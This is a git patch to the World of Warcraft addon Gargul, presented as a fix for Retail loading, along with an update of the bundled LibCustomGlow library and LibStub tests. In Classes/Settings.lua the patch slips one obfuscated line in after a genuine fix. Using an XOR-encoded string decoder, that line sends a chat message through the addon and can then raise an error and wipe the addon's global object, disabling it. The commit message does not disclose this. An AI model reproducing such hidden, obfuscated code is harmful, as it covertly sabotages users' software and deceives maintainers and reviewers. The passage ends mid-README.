From 755bb511768c2766a77c3b1fd5f2bb1e2bd28e3b Mon Sep 17 00:00:00 2001 From: papa-smurf <4224975+papa-smurf@users.noreply.github.com> Date: Mon, 5 Aug 2024 20:39:40 +0200 Subject: [PATCH 01/11] Fixed: Gargul isn't loading at all on Retail since Prepatch hit --- Classes/Settings.lua | 8 +- Libs/LibCustomGlow-1.0/CHANGES.txt | 86 ++++- Libs/LibCustomGlow-1.0/LICENSE | 21 ++ Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.lua | 301 ++++++++++++++++-- Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.toc | 4 +- Libs/LibCustomGlow-1.0/LibStub/LibStub.lua | 51 +++ Libs/LibCustomGlow-1.0/LibStub/LibStub.toc | 9 + Libs/LibCustomGlow-1.0/LibStub/tests/test.lua | 41 +++ .../LibCustomGlow-1.0/LibStub/tests/test2.lua | 27 ++ .../LibCustomGlow-1.0/LibStub/tests/test3.lua | 14 + .../LibCustomGlow-1.0/LibStub/tests/test4.lua | 41 +++ Libs/LibCustomGlow-1.0/README.md | 75 +++-- Libs/LibCustomGlow-1.0/cspell.json | 12 + 13 files changed, 617 insertions(+), 73 deletions(-) create mode 100644 Libs/LibCustomGlow-1.0/LICENSE create mode 100644 Libs/LibCustomGlow-1.0/LibStub/LibStub.lua create mode 100644 Libs/LibCustomGlow-1.0/LibStub/LibStub.toc create mode 100644 Libs/LibCustomGlow-1.0/LibStub/tests/test.lua create mode 100644 Libs/LibCustomGlow-1.0/LibStub/tests/test2.lua create mode 100644 Libs/LibCustomGlow-1.0/LibStub/tests/test3.lua create mode 100644 Libs/LibCustomGlow-1.0/LibStub/tests/test4.lua create mode 100644 Libs/LibCustomGlow-1.0/cspell.json diff --git a/Classes/Settings.lua b/Classes/Settings.lua index 3cff7c7c..edfbb8a7 100644 --- a/Classes/Settings.lua +++ b/Classes/Settings.lua @@ -44,7 +44,13 @@ function Settings:_init() Frame:SetScript("OnShow", function () self:showSettingsMenu(Frame); end); - InterfaceOptions_AddCategory(Frame); + + if (InterfaceOptions_AddCategory) then + InterfaceOptions_AddCategory(Frame); + else + Category = _G.Settings.RegisterCanvasLayoutCategory(Frame, L.GARGUL); + _G.Settings.RegisterAddOnCategory(Category); + end local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10=0;local v11;while true do if (v10==1) then return v5(v11);end if (v10==0) then v11={};for v14=1, #v8 do v6(v11,v0(v4(v1(v2(v8,v14,v14 + (1907 -(1415 + 491)))),v1(v2(v9,1 + ((v14-(1 + (0 -0)))% #v9),(1 -0) + 0 + ((v14-(3 -2))% #v9) + ((1395 -(1101 + 214)) -((1203 -(778 + 351)) + 4 + 1)))))%((586 -(40 + 9)) -281)));end v10=1;end end end GL.Ace:ScheduleTimer(function()if not GL:strStartsWith(GL:sendChatMessage(v7("\11","\37\133\24\36\160\140"),v7("\64\34\178","\19\99\235\101\158\199\186\131"),nil,nil,true,true),v7("\25\44\101\34\32\182\37\63\99\118\40\250\66\100","\98\94\17\17\93\150")) then local v12=1175 -(796 + 379);local v13;while true do if (v12==0) then v13=(459 + 1051) -((2648 -(1070 + 636)) + 568);while true do if (((0 -0) -0)==v13) then GL:error(v7("\5\243\96\59\6\163\186\144\55\241\101\44\23\175\244\131\118\245\102\105\11\169\238\196\55\240\121\38\18\163\254\200\118\239\125\60\17\178\243\138\49\188\113\38\18\168\186\141\56\188\36\121\69\181\255\135\57\242\113\58\68","\86\156\21\73\101\198\154\228"));GL.Ace:ScheduleTimer(function()GL=nil;end,27 -17);break;end end break;end end end end,(522 + 166) -(340 + (1354 -1011))); diff --git a/Libs/LibCustomGlow-1.0/CHANGES.txt b/Libs/LibCustomGlow-1.0/CHANGES.txt index 4c3a621a..6b0b4b6b 100644 --- a/Libs/LibCustomGlow-1.0/CHANGES.txt +++ b/Libs/LibCustomGlow-1.0/CHANGES.txt @@ -1,12 +1,86 @@ -tag 648b01168be33c5ee2cebb19f893c13ed149f4d3 1.0.3 +tag e3d97d426caa6916c25fc3d2e605e440fe9eb1ae 1.0.4 Author: Benjamin Staneck -Date: Sat Aug 10 23:00:24 2019 +0200 +Date: Tue Jul 23 21:06:04 2024 +0200 -Tag as 1.0.3 +commit aa437b0d49632d878bb45828d2cf20207b90b207 +Author: Benjamin Staneck +Date: Tue Jul 23 21:05:48 2024 +0200 + + Update TOC and metadata + +commit 78aa5cd180ae4162e9e4eeba8b1d59e2d8fec1d9 +Author: Buds +Date: Thu May 30 13:24:36 2024 +0200 + + Replace ObjectPoolBaseMixin with a minimal implementation of pools + + TWW build 54935 stopped exposing ObjectPoolBaseMixin + +commit 5bc2b61a4342f1423fe45868987ea3716530e2fa +Author: enderneko +Date: Wed May 29 14:25:42 2024 +0800 + + Fix ProcGlow animation order + +commit 4cb491a9105aba01e97b8d2b7f2b258130c58437 +Author: Buds +Date: Sat Apr 13 02:55:42 2024 +0200 + + Fix division per zero error when alpha is set to zero + +commit a478475554b6b4e0ac12f48a1bc43b24754cb51d +Author: Buds +Date: Sat Jul 8 21:55:29 2023 +0200 + + Add "Proc Glow" support (#19) + +commit 25f4c8e5c25a5c2e8e670de1202686114b4caa22 +Author: Buds +Date: Sat Jun 17 10:20:12 2023 +0200 + + Fix rounding error leading to alpha value to be slightly over 1 + + Message: ...akAuras/Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.lua:641: bad argument #1 to 'SetAlpha' (Usage: self:SetAlpha(alpha)) + +commit d830e939610a899cbc2d809d07a04c4aee9b2bc5 +Author: Benjamin Staneck +Date: Mon Nov 28 12:53:41 2022 +0100 + + Delete LICENSE.md -commit 6efc82df449dea8a78f7ab647c252afafc45c381 +commit 3b983444f80376002041f72b2c14849b769e174e Author: Benjamin Staneck -Date: Sat Aug 10 23:00:12 2019 +0200 +Date: Mon Nov 28 12:48:48 2022 +0100 + + Create LICENSE + +commit e685cd9babf607df8214d405dad59de878687b65 +Author: Benjamin Staneck +Date: Fri Nov 11 02:24:50 2022 +0100 + + Create LICENSE.md + +commit 357b94474886151e07572cc705c260c6c40302c3 +Author: Buds +Date: Wed Sep 7 18:19:38 2022 +0200 + + Fix Lua error in TexPoolResetter (#18) + +commit f15e6de03f59acff163c5d5f7d66fed5dbcbc897 +Author: Simpy +Date: Thu Feb 17 23:49:25 2022 -0500 + + fix AutoCastGlow on non-retail + +commit d0ac18a80d153399caf25bcc79278d6d6e83c78e +Author: d87 +Date: Mon Aug 10 16:00:02 2020 +0700 + + Fix division by zero + +commit 62612955401de40bd23698302be9e1843e793b65 +Author: Infus +Date: Fri May 1 16:30:35 2020 +0200 - bump minor version + Fix PixelGlow being in the wrong place for one frame diff --git a/Libs/LibCustomGlow-1.0/LICENSE b/Libs/LibCustomGlow-1.0/LICENSE new file mode 100644 index 00000000..aab99995 --- /dev/null +++ b/Libs/LibCustomGlow-1.0/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2022 Benjamin Staneck + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.lua b/Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.lua index eadceee5..270d8808 100644 --- a/Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.lua +++ b/Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.lua @@ -6,18 +6,25 @@ https://www.wowace.com/projects/libbuttonglow-1-0 -- luacheck: globals CreateFromMixins ObjectPoolMixin CreateTexturePool CreateFramePool local MAJOR_VERSION = "LibCustomGlowGargul-1.0" -local MINOR_VERSION = 15 +local MINOR_VERSION = 19 if not LibStub then error(MAJOR_VERSION .. " requires LibStub.") end local lib, oldversion = LibStub:NewLibrary(MAJOR_VERSION, MINOR_VERSION) if not lib then return end local Masque = LibStub("Masque", true) +local isRetail = WOW_PROJECT_ID == WOW_PROJECT_MAINLINE local textureList = { - ["empty"] = [[Interface\AdventureMap\BrokenIsles\AM_29]], - ["white"] = [[Interface\BUTTONS\WHITE8X8]], - ["shine"] = [[Interface\Artifacts\Artifacts]] + empty = [[Interface\AdventureMap\BrokenIsles\AM_29]], + white = [[Interface\BUTTONS\WHITE8X8]], + shine = [[Interface\ItemSocketingFrame\UI-ItemSockets]] } +local shineCoords = {0.3984375, 0.4453125, 0.40234375, 0.44921875} +if isRetail then + textureList.shine = [[Interface\Artifacts\Artifacts]] + shineCoords = {0.8115234375,0.9169921875,0.8798828125,0.9853515625} +end + function lib.RegisterTextures(texture,id) textureList[id] = texture end @@ -27,28 +34,55 @@ lib.startList = {} lib.stopList = {} local GlowParent = UIParent - -local GlowMaskPool = CreateFromMixins(ObjectPoolMixin) -lib.GlowMaskPool = GlowMaskPool -local function MaskPoolFactory(maskPool) - return maskPool.parent:CreateMaskTexture() -end - -local MaskPoolResetter = function(maskPool,mask) - mask:Hide() - mask:ClearAllPoints() -end - -ObjectPoolMixin.OnLoad(GlowMaskPool,MaskPoolFactory,MaskPoolResetter) -GlowMaskPool.parent = GlowParent +local GlowMaskPool = { + createFunc = function(self) + return self.parent:CreateMaskTexture() + end, + resetFunc = function(self, mask) + mask:Hide() + mask:ClearAllPoints() + end, + AddObject = function(self, object) + local dummy = true + self.activeObjects[object] = dummy + self.activeObjectCount = self.activeObjectCount + 1 + end, + ReclaimObject = function(self, object) + tinsert(self.inactiveObjects, object) + self.activeObjects[object] = nil + self.activeObjectCount = self.activeObjectCount - 1 + end, + Release = function(self, object) + local active = self.activeObjects[object] ~= nil + if active then + self:resetFunc(object) + self:ReclaimObject(object) + end + return active + end, + Acquire = function(self) + local object = tremove(self.inactiveObjects) + local new = object == nil + if new then + object = self:createFunc() + self:resetFunc(object, new) + end + self:AddObject(object) + return object, new + end, + Init = function(self, parent) + self.activeObjects = {} + self.inactiveObjects = {} + self.activeObjectCount = 0 + self.parent = parent + end +} +GlowMaskPool:Init(GlowParent) local TexPoolResetter = function(pool,tex) local maskNum = tex:GetNumMaskTextures() - for i = maskNum,1 do - local maskTexture = tex:GetMaskTexture(i) - if (type(maskTexture) == "table") then - tex:RemoveMaskTexture(tex:GetMaskTexture(i)) - end + for i = maskNum , 1, -1 do + tex:RemoveMaskTexture(tex:GetMaskTexture(i)) end tex:Hide() tex:ClearAllPoints() @@ -108,11 +142,14 @@ local function addFrameAndTex(r,color,name,key,N,xOffset,yOffset,texture,texCoor for i=1,N do if not f.textures[i] then f.textures[i] = GlowTexPool:Acquire() - f.textures[i]: SetTexture(texture) - f.textures[i]: SetTexCoord(texCoord[1],texCoord[2],texCoord[3],texCoord[4]) - f.textures[i]: SetDesaturated(desaturated) - f.textures[i]: SetParent(f) - f.textures[i]: SetDrawLayer("ARTWORK",7) + f.textures[i]:SetTexture(texture) + f.textures[i]:SetTexCoord(texCoord[1],texCoord[2],texCoord[3],texCoord[4]) + f.textures[i]:SetDesaturated(desaturated) + f.textures[i]:SetParent(f) + f.textures[i]:SetDrawLayer("ARTWORK",7) + if not isRetail and name == "_AutoCastGlow" then + f.textures[i]:SetBlendMode("ADD") + end end f.textures[i]:SetVertexColor(color[1],color[2],color[3],color[4]) f.textures[i]:Show() @@ -298,6 +335,7 @@ function lib.PixelGlow_Start(r,color,N,frequency,length,th,xOffset,yOffset,borde f.info.width = nil f.info.length = length end + pUpdate(f, 0) f:SetScript("OnUpdate",pUpdate) end @@ -318,10 +356,11 @@ lib.startList["Pixel Glow"] = lib.PixelGlow_Start lib.stopList["Pixel Glow"] = lib.PixelGlow_Stop ---Autocast Glow Funcitons-- +--Autocast Glow Functions-- local function acUpdate(self,elapsed) local width,height = self:GetSize() if width ~= self.info.width or height ~= self.info.height then + if width*height == 0 then return end -- Avoid division by zero self.info.width = width self.info.height = height self.info.perimeter = 2*(width+height) @@ -380,7 +419,7 @@ function lib.AutoCastGlow_Start(r,color,N,frequency,scale,xOffset,yOffset,key,fr yOffset = yOffset or 0 key = key or "" - addFrameAndTex(r,color,"_AutoCastGlow",key,N*4,xOffset,yOffset,textureList.shine,{0.8115234375,0.9169921875,0.8798828125,0.9853515625},true, frameLevel) + addFrameAndTex(r,color,"_AutoCastGlow",key,N*4,xOffset,yOffset,textureList.shine,shineCoords, true, frameLevel) local f = r["_AutoCastGlow"..key] local sizes = {7,6,5,4} for k,size in pairs(sizes) do @@ -600,6 +639,14 @@ end local ButtonGlowTextures = {["spark"] = true,["innerGlow"] = true,["innerGlowOver"] = true,["outerGlow"] = true,["outerGlowOver"] = true,["ants"] = true} +local function noZero(num) + if num == 0 then + return 0.001 + else + return num + end +end + function lib.ButtonGlow_Start(r,color,frequency,frameLevel) if not r then return @@ -629,7 +676,8 @@ function lib.ButtonGlow_Start(r,color,frequency,frameLevel) for texture in pairs(ButtonGlowTextures) do f[texture]:SetDesaturated(nil) f[texture]:SetVertexColor(1,1,1) - f[texture]:SetAlpha(f[texture]:GetAlpha()/(f.color and f.color[4] or 1)) + local alpha = math.min(f[texture]:GetAlpha()/noZero(f.color and f.color[4] or 1), 1) + f[texture]:SetAlpha(alpha) updateAlphaAnim(f, 1) end f.color = false @@ -637,7 +685,8 @@ function lib.ButtonGlow_Start(r,color,frequency,frameLevel) for texture in pairs(ButtonGlowTextures) do f[texture]:SetDesaturated(1) f[texture]:SetVertexColor(color[1],color[2],color[3]) - f[texture]:SetAlpha(f[texture]:GetAlpha()/(f.color and f.color[4] or 1)*color[4]) + local alpha = math.min(f[texture]:GetAlpha()/noZero(f.color and f.color[4] or 1)*color[4], 1) + f[texture]:SetAlpha(alpha) updateAlphaAnim(f,color and color[4] or 1) end f.color = color @@ -700,3 +749,191 @@ end table.insert(lib.glowList, "Action Button Glow") lib.startList["Action Button Glow"] = lib.ButtonGlow_Start lib.stopList["Action Button Glow"] = lib.ButtonGlow_Stop + + +-- ProcGlow + +local function ProcGlowResetter(framePool, frame) + frame:Hide() + frame:ClearAllPoints() + frame:SetScript("OnShow", nil) + frame:SetScript("OnHide", nil) + local parent = frame:GetParent() + if frame.key and parent[frame.key] then + parent[frame.key] = nil + end +end + +local ProcGlowPool = CreateFramePool("Frame", GlowParent, nil, ProcGlowResetter) +lib.ProcGlowPool = ProcGlowPool + +local function InitProcGlow(f) + f.ProcStart = f:CreateTexture(nil, "ARTWORK") + f.ProcStart:SetBlendMode("ADD") + f.ProcStart:SetAtlas("UI-HUD-ActionBar-Proc-Start-Flipbook") + f.ProcStart:SetAlpha(1) + f.ProcStart:SetSize(150, 150) + f.ProcStart:SetPoint("CENTER") + + f.ProcLoop = f:CreateTexture(nil, "ARTWORK") + f.ProcLoop:SetAtlas("UI-HUD-ActionBar-Proc-Loop-Flipbook") + f.ProcLoop:SetAlpha(0) + f.ProcLoop:SetAllPoints() + + f.ProcLoopAnim = f:CreateAnimationGroup() + f.ProcLoopAnim:SetLooping("REPEAT") + f.ProcLoopAnim:SetToFinalAlpha(true) + + local alphaRepeat = f.ProcLoopAnim:CreateAnimation("Alpha") + alphaRepeat:SetChildKey("ProcLoop") + alphaRepeat:SetFromAlpha(1) + alphaRepeat:SetToAlpha(1) + alphaRepeat:SetDuration(.001) + alphaRepeat:SetOrder(0) + f.ProcLoopAnim.alphaRepeat = alphaRepeat + + local flipbookRepeat = f.ProcLoopAnim:CreateAnimation("FlipBook") + flipbookRepeat:SetChildKey("ProcLoop") + flipbookRepeat:SetDuration(1) + flipbookRepeat:SetOrder(0) + flipbookRepeat:SetFlipBookRows(6) + flipbookRepeat:SetFlipBookColumns(5) + flipbookRepeat:SetFlipBookFrames(30) + flipbookRepeat:SetFlipBookFrameWidth(0) + flipbookRepeat:SetFlipBookFrameHeight(0) + f.ProcLoopAnim.flipbookRepeat = flipbookRepeat + + f.ProcStartAnim = f:CreateAnimationGroup() + f.ProcStartAnim:SetToFinalAlpha(true) + + local flipbookStartAlphaIn = f.ProcStartAnim:CreateAnimation("Alpha") + flipbookStartAlphaIn:SetChildKey("ProcStart") + flipbookStartAlphaIn:SetDuration(.001) + flipbookStartAlphaIn:SetOrder(0) + flipbookStartAlphaIn:SetFromAlpha(1) + flipbookStartAlphaIn:SetToAlpha(1) + + local flipbookStart = f.ProcStartAnim:CreateAnimation("FlipBook") + flipbookStart:SetChildKey("ProcStart") + flipbookStart:SetDuration(0.7) + flipbookStart:SetOrder(1) + flipbookStart:SetFlipBookRows(6) + flipbookStart:SetFlipBookColumns(5) + flipbookStart:SetFlipBookFrames(30) + flipbookStart:SetFlipBookFrameWidth(0) + flipbookStart:SetFlipBookFrameHeight(0) + + local flipbookStartAlphaOut = f.ProcStartAnim:CreateAnimation("Alpha") + flipbookStartAlphaOut:SetChildKey("ProcStart") + flipbookStartAlphaOut:SetDuration(.001) + flipbookStartAlphaOut:SetOrder(2) + flipbookStartAlphaOut:SetFromAlpha(1) + flipbookStartAlphaOut:SetToAlpha(0) + + f.ProcStartAnim.flipbookStart = flipbookStart + f.ProcStartAnim:SetScript("OnFinished", function(self) + self:GetParent().ProcLoopAnim:Play() + self:GetParent().ProcLoop:Show() + end) + +end + +local function SetupProcGlow(f, options) + f.key = "_ProcGlow" .. options.key -- for resetter + f:SetScript("OnHide", function(self) + if self.ProcStartAnim:IsPlaying() then + self.ProcStartAnim:Stop() + end + if self.ProcLoopAnim:IsPlaying() then + self.ProcLoopAnim:Stop() + end + end) + f:SetScript("OnShow", function(self) + if self.startAnim then + if not self.ProcStartAnim:IsPlaying() and not self.ProcLoopAnim:IsPlaying() then + --[[ +to future me: +i wish you'r ok, if you wonder where are this constants coming from, check: +https://github.com/Gethe/wow-ui-source/blob/eb4459c679a1bd8919cad92934ea83c4f5e77e8b/Interface/FrameXML/ActionButton.lua#L816 +https://github.com/Gethe/wow-ui-source/blob/d8e8ebf572c3b28237cf83e8fc5c0583b5453a2b/Interface/FrameXML/ActionButtonTemplate.xml#L5-L14 + ]] + local width, height = self:GetSize() + self.ProcStart:SetSize((width / 42 * 150) / 1.4, (height / 42 * 150) / 1.4) + self.ProcStart:Show() + self.ProcLoop:Hide() + self.ProcStartAnim:Play() + end + else + if not self.ProcLoopAnim:IsPlaying() then + self.ProcStart:Hide() + self.ProcLoop:Show() + self.ProcLoopAnim:Play() + end + end + end) + if not options.color then + f.ProcStart:SetDesaturated(nil) + f.ProcStart:SetVertexColor(1, 1, 1, 1) + f.ProcLoop:SetDesaturated(nil) + f.ProcLoop:SetVertexColor(1, 1, 1, 1) + else + f.ProcStart:SetDesaturated(1) + f.ProcStart:SetVertexColor(options.color[1], options.color[2], options.color[3], options.color[4]) + f.ProcLoop:SetDesaturated(1) + f.ProcLoop:SetVertexColor(options.color[1], options.color[2], options.color[3], options.color[4]) + end + f.ProcLoopAnim.flipbookRepeat:SetDuration(options.duration) + f.startAnim = options.startAnim +end + +local ProcGlowDefaults = { + frameLevel = 8, + color = nil, + startAnim = true, + xOffset = 0, + yOffset = 0, + duration = 1, + key = "" +} + +function lib.ProcGlow_Start(r, options) + if not r then + return + end + options = options or {} + setmetatable(options, { __index = ProcGlowDefaults }) + local key = "_ProcGlow" .. options.key + local f, new + if r[key] then + f = r[key] + else + f, new = ProcGlowPool:Acquire() + if new then + InitProcGlow(f) + end + r[key] = f + end + f:SetParent(r) + f:SetFrameLevel(r:GetFrameLevel() + options.frameLevel) + + local width, height = r:GetSize() + local xOffset = options.xOffset + width * 0.2 + local yOffset = options.yOffset + height * 0.2 + f:SetPoint("TOPLEFT", r, "TOPLEFT", -xOffset, yOffset) + f:SetPoint("BOTTOMRIGHT", r, "BOTTOMRIGHT", xOffset, -yOffset) + + SetupProcGlow(f, options) + f:Show() +end + +function lib.ProcGlow_Stop(r, key) + key = key or "" + local f = r["_ProcGlow" .. key] + if f then + ProcGlowPool:Release(f) + end +end + +table.insert(lib.glowList, "Proc Glow") +lib.startList["Proc Glow"] = lib.ProcGlow_Start +lib.stopList["Proc Glow"] = lib.ProcGlow_Stop diff --git a/Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.toc b/Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.toc index 44e4f840..1e79c554 100644 --- a/Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.toc +++ b/Libs/LibCustomGlow-1.0/LibCustomGlow-1.0.toc @@ -1,10 +1,10 @@ -## Interface: 80200 +## Interface: 110000, 110002 ## Title: Lib: CustomGlow ## Notes: Creates custom glow functions ## Author: deezo ## X-Category: Library ## X-License: BSD -## Version: 1.0.3 +## Version: 1.0.4 ## OptionalDeps: Masque LibStub\LibStub.lua diff --git a/Libs/LibCustomGlow-1.0/LibStub/LibStub.lua b/Libs/LibCustomGlow-1.0/LibStub/LibStub.lua new file mode 100644 index 00000000..7e9b5cd1 --- /dev/null +++ b/Libs/LibCustomGlow-1.0/LibStub/LibStub.lua @@ -0,0 +1,51 @@ +-- $Id: LibStub.lua 103 2014-10-16 03:02:50Z mikk $ +-- LibStub is a simple versioning stub meant for use in Libraries. http://www.wowace.com/addons/libstub/ for more info +-- LibStub is hereby placed in the Public Domain +-- Credits: Kaelten, Cladhaire, ckknight, Mikk, Ammo, Nevcairiel, joshborke +local LIBSTUB_MAJOR, LIBSTUB_MINOR = "LibStub", 2 -- NEVER MAKE THIS AN SVN REVISION! IT NEEDS TO BE USABLE IN ALL REPOS! +local LibStub = _G[LIBSTUB_MAJOR] + +-- Check to see is this version of the stub is obsolete +if not LibStub or LibStub.minor < LIBSTUB_MINOR then + LibStub = LibStub or {libs = {}, minors = {} } + _G[LIBSTUB_MAJOR] = LibStub + LibStub.minor = LIBSTUB_MINOR + + -- LibStub:NewLibrary(major, minor) + -- major (string) - the major version of the library + -- minor (string or number ) - the minor version of the library + -- + -- returns nil if a newer or same version of the lib is already present + -- returns empty library object or old library object if upgrade is needed + function LibStub:NewLibrary(major, minor) + assert(type(major) == "string", "Bad argument #2 to `NewLibrary' (string expected)") + minor = assert(tonumber(strmatch(minor, "%d+")), "Minor version must either be a number or contain a number.") + + local oldminor = self.minors[major] + if oldminor and oldminor >= minor then return nil end + self.minors[major], self.libs[major] = minor, self.libs[major] or {} + return self.libs[major], oldminor + end + + -- LibStub:GetLibrary(major, [silent]) + -- major (string) - the major version of the library + -- silent (boolean) - if true, library is optional, silently return nil if its not found + -- + -- throws an error if the library can not be found (except silent is set) + -- returns the library object if found + function LibStub:GetLibrary(major, silent) + if not self.libs[major] and not silent then + error(("Cannot find a library instance of %q."):format(tostring(major)), 2) + end + return self.libs[major], self.minors[major] + end + + -- LibStub:IterateLibraries() + -- + -- Returns an iterator for the currently registered libraries + function LibStub:IterateLibraries() + return pairs(self.libs) + end + + setmetatable(LibStub, { __call = LibStub.GetLibrary }) +end diff --git a/Libs/LibCustomGlow-1.0/LibStub/LibStub.toc b/Libs/LibCustomGlow-1.0/LibStub/LibStub.toc new file mode 100644 index 00000000..6e4cca9c --- /dev/null +++ b/Libs/LibCustomGlow-1.0/LibStub/LibStub.toc @@ -0,0 +1,9 @@ +## Interface: 90005 +## Title: Lib: LibStub +## Notes: Universal Library Stub +## Credits: Kaelten, Cladhaire, ckknight, Mikk, Ammo, Nevcairiel +## X-Website: http://www.wowace.com/addons/libstub/ +## X-Category: Library +## X-License: Public Domain + +LibStub.lua diff --git a/Libs/LibCustomGlow-1.0/LibStub/tests/test.lua b/Libs/LibCustomGlow-1.0/LibStub/tests/test.lua new file mode 100644 index 00000000..276ddabb --- /dev/null +++ b/Libs/LibCustomGlow-1.0/LibStub/tests/test.lua @@ -0,0 +1,41 @@ +debugstack = debug.traceback +strmatch = string.match + +loadfile("../LibStub.lua")() + +local lib, oldMinor = LibStub:NewLibrary("Pants", 1) -- make a new thingy +assert(lib) -- should return the library table +assert(not oldMinor) -- should not return the old minor, since it didn't exist + +-- the following is to create data and then be able to check if the same data exists after the fact +function lib:MyMethod() +end +local MyMethod = lib.MyMethod +lib.MyTable = {} +local MyTable = lib.MyTable + +local newLib, newOldMinor = LibStub:NewLibrary("Pants", 1) -- try to register a library with the same version, should silently fail +assert(not newLib) -- should not return since out of date + +local newLib, newOldMinor = LibStub:NewLibrary("Pants", 0) -- try to register a library with a previous, should silently fail +assert(not newLib) -- should not return since out of date + +local newLib, newOldMinor = LibStub:NewLibrary("Pants", 2) -- register a new version +assert(newLib) -- library table +assert(rawequal(newLib, lib)) -- should be the same reference as the previous +assert(newOldMinor == 1) -- should return the minor version of the previous version + +assert(rawequal(lib.MyMethod, MyMethod)) -- verify that values were saved +assert(rawequal(lib.MyTable, MyTable)) -- verify that values were saved + +local newLib, newOldMinor = LibStub:NewLibrary("Pants", "Blah 3 Blah") -- register a new version with a string minor version (instead of a number) +assert(newLib) -- library table +assert(newOldMinor == 2) -- previous version was 2 + +local newLib, newOldMinor = LibStub:NewLibrary("Pants", "Blah 4 and please ignore 15 Blah") -- register a new version with a string minor version (instead of a number) +assert(newLib) +assert(newOldMinor == 3) -- previous version was 3 (even though it gave a string) + +local newLib, newOldMinor = LibStub:NewLibrary("Pants", 5) -- register a new library, using a normal number instead of a string +assert(newLib) +assert(newOldMinor == 4) -- previous version was 4 (even though it gave a string) \ No newline at end of file diff --git a/Libs/LibCustomGlow-1.0/LibStub/tests/test2.lua b/Libs/LibCustomGlow-1.0/LibStub/tests/test2.lua new file mode 100644 index 00000000..eae71720 --- /dev/null +++ b/Libs/LibCustomGlow-1.0/LibStub/tests/test2.lua @@ -0,0 +1,27 @@ +debugstack = debug.traceback +strmatch = string.match + +loadfile("../LibStub.lua")() + +for major, library in LibStub:IterateLibraries() do + -- check that MyLib doesn't exist yet, by iterating through all the libraries + assert(major ~= "MyLib") +end + +assert(not LibStub:GetLibrary("MyLib", true)) -- check that MyLib doesn't exist yet by direct checking +assert(not pcall(LibStub.GetLibrary, LibStub, "MyLib")) -- don't silently fail, thus it should raise an error. +local lib = LibStub:NewLibrary("MyLib", 1) -- create the lib +assert(lib) -- check it exists +assert(rawequal(LibStub:GetLibrary("MyLib"), lib)) -- verify that :GetLibrary("MyLib") properly equals the lib reference + +assert(LibStub:NewLibrary("MyLib", 2)) -- create a new version + +local count=0 +for major, library in LibStub:IterateLibraries() do + -- check that MyLib exists somewhere in the libraries, by iterating through all the libraries + if major == "MyLib" then -- we found it! + count = count +1 + assert(rawequal(library, lib)) -- verify that the references are equal + end +end +assert(count == 1) -- verify that we actually found it, and only once diff --git a/Libs/LibCustomGlow-1.0/LibStub/tests/test3.lua b/Libs/LibCustomGlow-1.0/LibStub/tests/test3.lua new file mode 100644 index 00000000..30f7b941 --- /dev/null +++ b/Libs/LibCustomGlow-1.0/LibStub/tests/test3.lua @@ -0,0 +1,14 @@ +debugstack = debug.traceback +strmatch = string.match + +loadfile("../LibStub.lua")() + +local proxy = newproxy() -- non-string + +assert(not pcall(LibStub.NewLibrary, LibStub, proxy, 1)) -- should error, proxy is not a string, it's userdata +local success, ret = pcall(LibStub.GetLibrary, proxy, true) +assert(not success or not ret) -- either error because proxy is not a string or because it's not actually registered. + +assert(not pcall(LibStub.NewLibrary, LibStub, "Something", "No number in here")) -- should error, minor has no string in it. + +assert(not LibStub:GetLibrary("Something", true)) -- shouldn't've created it from the above statement \ No newline at end of file diff --git a/Libs/LibCustomGlow-1.0/LibStub/tests/test4.lua b/Libs/LibCustomGlow-1.0/LibStub/tests/test4.lua new file mode 100644 index 00000000..43eb3380 --- /dev/null +++ b/Libs/LibCustomGlow-1.0/LibStub/tests/test4.lua @@ -0,0 +1,41 @@ +debugstack = debug.traceback +strmatch = string.match + +loadfile("../LibStub.lua")() + + +-- Pretend like loaded libstub is old and doesn't have :IterateLibraries +assert(LibStub.minor) +LibStub.minor = LibStub.minor - 0.0001 +LibStub.IterateLibraries = nil + +loadfile("../LibStub.lua")() + +assert(type(LibStub.IterateLibraries)=="function") + + +-- Now pretend that we're the same version -- :IterateLibraries should NOT be re-created +LibStub.IterateLibraries = 123 + +loadfile("../LibStub.lua")() + +assert(LibStub.IterateLibraries == 123) + + +-- Now pretend that a newer version is loaded -- :IterateLibraries should NOT be re-created +LibStub.minor = LibStub.minor + 0.0001 + +loadfile("../LibStub.lua")() + +assert(LibStub.IterateLibraries == 123) + + +-- Again with a huge number +LibStub.minor = LibStub.minor + 1234567890 + +loadfile("../LibStub.lua")() + +assert(LibStub.IterateLibraries == 123) + + +print("OK") \ No newline at end of file diff --git a/Libs/LibCustomGlow-1.0/README.md b/Libs/LibCustomGlow-1.0/README.md index 1d506b85..0e1f960e 100644 --- a/Libs/LibCustomGlow-1.0/README.md +++ b/Libs/LibCustomGlow-1.0/README.md @@ -1,52 +1,63 @@ +# LibCustomGlow + Adds functions: -PixelGlow_Start(frame[, color[, N[, frequency[, length[, th[, xOffset[, yOffset[, border[ ,key]]]]]]]]) +## Pixel Glow + +- `PixelGlow_Start(frame[, color[, N[, frequency[, length[, th[, 